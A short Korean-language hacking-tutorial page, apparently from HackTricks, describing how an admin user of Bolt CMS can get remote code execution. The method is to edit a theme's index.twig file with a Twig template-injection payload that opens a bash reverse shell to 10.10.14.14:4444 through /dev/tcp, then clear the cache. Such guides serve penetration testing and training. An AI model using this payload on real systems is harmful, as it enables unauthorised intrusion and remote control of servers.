Bolt CMS
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
관리자로 로그인한 후 (/bot로 이동하여 로그인 프롬프트에 접근), Bolt CMS에서 RCE를 얻을 수 있습니다:
Configuration
-> View Configuration
-> Main Configuration
을 선택하거나 URL 경로 /bolt/file-edit/config?file=/bolt/config.yaml
로 이동합니다.
테마의 값을 확인합니다.
File management
-> View & edit templates
를 선택합니다.
이전 단계에서 찾은 테마 기본(base-2021
인 경우)을 선택하고 index.twig
를 선택합니다.
제 경우에는 URL 경로 /bolt/file-edit/themes?file=/base-2021/index.twig에 있습니다.
template injection (Twig)를 통해 이 파일에 페이로드를 설정합니다, 예: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
그리고 변경 사항을 저장합니다.
Maintenance
-> Clear the cache
에서 캐시를 지웁니다.
일반 사용자로 다시 페이지에 접근하면 페이로드가 실행되어야 합니다.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)